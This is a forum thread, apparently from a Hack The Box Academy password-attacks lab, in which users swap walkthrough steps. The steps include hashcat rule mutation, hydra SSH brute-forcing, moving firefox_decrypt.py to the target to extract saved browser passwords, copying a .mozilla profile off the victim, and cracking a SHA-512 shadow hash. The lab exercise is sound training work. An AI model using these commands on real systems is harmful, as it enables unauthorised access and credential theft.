PASSWORD ATTACK | ACADEMY - Credential Hunting in Linux

That’s a very common approach on all these exercises. GitHub usually is not resolvable.

Need help with this. I am very fustrated with firefox_decrypt.py not being part of htb especially when the vpn prevents you from downloading it for security reasons. Can somebody please help me because I have been struggling on this?

ooh man :laughing: :rofl:

Step 1 Mutated Password “Loveyou1”
echo “Loveyou1” | hashcat --force -r Downloads/custom.rule --stdout | sort -u > mutated-passwords

Step 2 Bruteforced Login
hydra -L user.list -P mut_password4.list ssh://10.129.92.118

Set 3 SSH With new password
ssh kira@10.129.92.118

Step 4 Set up HTTP server and transfer firefor_decrpt.py
python3 -m http.server 8000
wget http://10.10.14.246:8000 -r -np -nH --cut-dirs=1

Step 5 run and you will get will password
python3.9 firefox_decrypt.py

1 Like

kira@nix01:~/Desktop/10.10.14.188/firefox_decrypt$ python3 firefox_decrypt.py
Traceback (most recent call last):
File “firefox_decrypt.py”, line 46, in
PWStore = list[dict[str, str]]
TypeError: ‘type’ object is not subscriptable

Someone please tell me what I’m missing. Been on this for days
:weary::weary:

1 Like

I had this issue too and its a nightmare. Essentially the author has now updated the software to only work with a version of python that is not installed on the box anymore, and being that you are not SUDO, you cannot update python on the target. The fix lies in the OLD releases/tags on the firefix_decrypt github page…frustrating but also satisfying in the end

1 Like

This helped a lot. Thank you!!!
But I’d love to know…How did you know to use an older version of the tool??

Happy to help! The GitHub states that the tool now needs at least python X and I did a python —version check on the box and it’s not new enough. So after poking around I found the old versions (pre v1) and tried them instead! Cheers and good luck

1 Like

I don’t know if this is the intended route, but somewhere in the beginning of the module it was stated that password reuse is common, so in each section I saved valid usernames and passwords that I came across.

Spraying with these lists I could log in with user s** from a previous section and then on the system I can see the other users, will and kira. So now I need to find kira’s password to be at the point of the hint I guess.

1 Like

Thank you so much, u helped me a lot :slight_smile:

Using Hydra to brute-force a password over SSH can be quite time-consuming and error-prone. There’s another service you can target that will get a hit much quicker, and the same password will work on SSH once you’ve cracked it. When you get into the victim machine, you may find it easier to scp the .mozilla folder onto your attack machine and run the Python script there, rather than trying to get the script and Python set up on the victim machine, but be sure to tell the script which directory to target, else it will default to cracking your own Firefox passwords.

If there is anyone having trouble with the final salted hash after retrieving it from the hidden shadow.bak in the will directory. Using the custom.rule with the -r option and the provided password.list from the resources will provide the proper password mutation to get your collision.

This includes:

  • $6$: Indicates SHA-512 is the hashing algorithm.
  • XePuRx/4eO0WuuPS: The salt.
    “XXXXXXXX” Password hash

so we get “sudo hashcat -m 1800 -a 0 (path to hash.txt) (path to password.list) -r (path to custom.rule)” —Happy cracking—